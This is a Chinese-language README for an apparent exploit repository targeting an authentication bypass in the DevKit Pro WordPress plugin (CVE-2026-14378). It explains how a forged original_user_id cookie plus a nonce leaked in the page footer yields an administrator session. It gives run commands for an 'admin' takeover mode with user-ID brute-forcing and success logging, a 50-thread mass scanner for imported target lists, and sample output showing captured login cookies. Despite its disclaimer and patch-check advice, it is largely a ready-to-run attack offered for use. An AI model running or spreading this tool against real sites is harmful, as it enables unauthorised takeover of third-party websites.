针对 CVE-2026-14378 的概念验证扫描器与漏洞利用辅助工具:WordPress 插件 DevKit Pro(dplugins)中通过有缺陷的用户切换“还原”流程实现的未认证管理员会话接管。
法律声明: 仅可在您拥有或已获得明确书面许可进行测试的系统上使用。未经授权的访问是非法的。本仓库用于防御性研究、验证和补丁验证。
PoC for CVE-2026-14378: DevKit Pro ≤2.3.0 pre-auth admin takeover via forged original_user_id cookie + wp_footer revert_switch nonce. check/admin + mass scan.
建议主题: cve-2026-14378、wordpress、wordpress-exploit、devkit-pro、dplugins、authentication-bypass、poc、security-research
| CVE | CVE-2026-14378 |
| 产品 | DevKit Pro(厂商:dplugins) |
| 类型 | 身份验证绕过 → 完整管理员会话(CWE-287) |
| 受影响版本 | 所有 ≤ 2.3.0 版本 |
| 修复版本 | 3.0.0+(更新日志) |
| CVSS 3.1 | 9.8 严重 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| CVE | 问题 | 所需权限 |
|---|---|---|
| CVE-2026-14357 | 通过 DPDEV_install_themes 安装任意主题 ZIP | Subscriber+ |
| CVE-2026-14378 | 通过用户切换还原实现会话接管 | 无 |
本 PoC 仅针对 14378。
DevKit Pro 的 Users Manager 可以模拟用户进行测试。当管理员切换到另一个账户时,插件会将先前的身份存储在客户端 cookie 中:
original_user_id — 切换前账户的用户 ID当该 cookie 存在时,插件会在前端的 wp_footer 中渲染一个**“切换回来”**控件,其中包含一个绑定到还原操作的 WordPress nonce。
revert_switch 处理程序(AJAX)调用 verify_nonce_and_capability(),该函数错误地针对 original_user_id 所引用的用户评估 manage_options,而不是对实际请求者(可能完全未认证)使用 current_user_can()。
攻击者可以:
Cookie: original_user_id=<administrator_user_id>(通常为 1)。wp-admin/admin-ajax.php 发送 POST 请求,参数为 action=revert_switch(或插件特定别名)以及泄露的 nonce。wp_set_auth_cookie() → 已认证的管理员会话。官方功能背景:Users Manager — switch back。
sequenceDiagram
participant A as Attacker
participant W as WordPress (front end)
participant P as DevKit Pro
participant X as admin-ajax.php
A->>W: GET / (Cookie: original_user_id=1)
W->>P: wp_footer hook
P-->>W: switch-back HTML + nonce
W-->>A: page body contains nonce
A->>X: POST action=revert_switch + nonce
Note over P,X: capability checked for user 1, not attacker
X-->>A: Set-Cookie wordpress_logged_in_*
A->>W: GET /wp-admin/
W-->>A: admin dashboard
check 命令有意设计为严格模式:仅当伪造 original_user_id 后出现切换回来 nonce 时,才会报告存在漏洞。
| 观察结果 | 可能含义 |
|---|---|
VULNERABLE — switch-back material leaked | 漏洞利用路径可能有效;在执行 admin 前请在实验环境中确认。 |
not vulnerable (check): no switch-back nonce… | 已修补的 DevKit(≥ 3.0.0)、插件未安装、Users Manager 已禁用(默认关闭)、自定义插件路径、缓存/CDN 剥离页脚,或目标站点错误。 |
DevKit Pro readme not confirmed | 无公开的 readme.txt 指纹;插件可能仍然存在但被隐藏 — oracle 仍是决定性测试。 |
DevKit Pro <= 2.3.0 suspected + 仍无 nonce | 可能安装了存在漏洞的版本,但切换功能未启用或测试的 URL 未渲染页脚。 |
注意: 对 /wp-content/plugins/.../readme.txt 返回 HTTP 200 且内容为完整 HTML 页面,是常见的 WordPress 软 404。本 PoC 验证的是 readme 内容(Plugin Name: 头),而不仅仅是状态码。
pip install requests
可选:requirements.txt 包含固定的最低版本:
requests>=2.28.0
git clone https://github.com/YOUR_USER/cve-2026-14378-poc.git
cd cve-2026-14378-poc
pip install -r requirements.txt # or: pip install requests
不会完成接管;仅测试页脚 nonce oracle。
python poc.py check https://target.example/
python poc.py check https://target.example/ --user-id 2
python poc.py check https://target.example/ --timeout 40
尝试完整的 revert_switch 并验证 /wp-admin/ 访问权限。
python poc.py admin https://target.example/
python poc.py admin https://target.example/ --user-id 1 --brute 5
python poc.py admin https://target.example/ --log successes.txt
| 参数 | 描述 |
|---|---|
--user-id | 在 original_user_id 中伪造的管理员(或目标)用户 ID(默认:1) |
--brute | 当第一个 ID 失败时,尝试 ID 1..N |
--timeout | HTTP 超时时间(秒)(默认:25) |
--log | 将成功的 admin URL 追加到文件(默认:logs.txt) |
每行一个 URL;# 注释以及空白后的额外列将被忽略。
# Detection only (recommended first pass)
python poc.py targets.txt
# Exploit attempts (authorized targets only)
python poc.py targets.txt admin
如果第一个参数未传入文件,脚本会提示输入列表路径(与旧版批量扫描器行为相同)。
批量模式使用线程池(50 个工作线程)。如果遇到速率限制,请在 poc.py 中调整。
# FOFA / manual imports
https://staging.example.com
example.org
192.0.2.10|wordpress|1.2.3 # only first token is used
存在漏洞(check):
[*] https://vulnerable.example
[+] DevKit Pro <= 2.3.0 suspected (stable tag 2.3.0)
[+] VULNERABLE — switch-back material leaked (action=revert_switch, nonce=a1b2c3d4…)
不存在漏洞(典型批量扫描):
[*] https://patched.example
[!] DevKit Pro readme not confirmed (hidden path, WAF, or plugin absent)
[-] not vulnerable (check): no switch-back nonce in wp_footer with forged original_user_id cookie — patched DevKit, Users Manager off, or wrong target
成功获取管理员权限:
[*] https://lab.local
[+] https://lab.local -> administrator session as user_id=1
[+] cookie: wordpress_logged_in_…=…
verify=False);跟随重定向;出错时可选 HTTP↔HTTPS 回退。revert_switch、DPDEV_revert_switch、dpdev_revert_switch、devkit_revert_switch(商业插件;确切的钩子名称可能因构建版本而异)。/、/?p=1、/sample-page/、/index.php,携带伪造的 cookie。wordpress_logged_in_* cookie 和/或 /wp-admin/ 仪表盘标记。DevKit Pro 不在 wordpress.org 上分发;版本指纹识别依赖于暴露的 readme.txt(如果存在)。
admin-ajax.php revert_switch 活动。作者和贡献者对滥用不承担任何责任。使用本软件即表示您同意遵守适用法律并获得适当授权。鼓励防御者在升级到 DevKit Pro 3.0.0+ 后使用 check 模式验证补丁。
MIT — 如包含请参见 LICENSE;否则在发布仓库时指定您的许可证。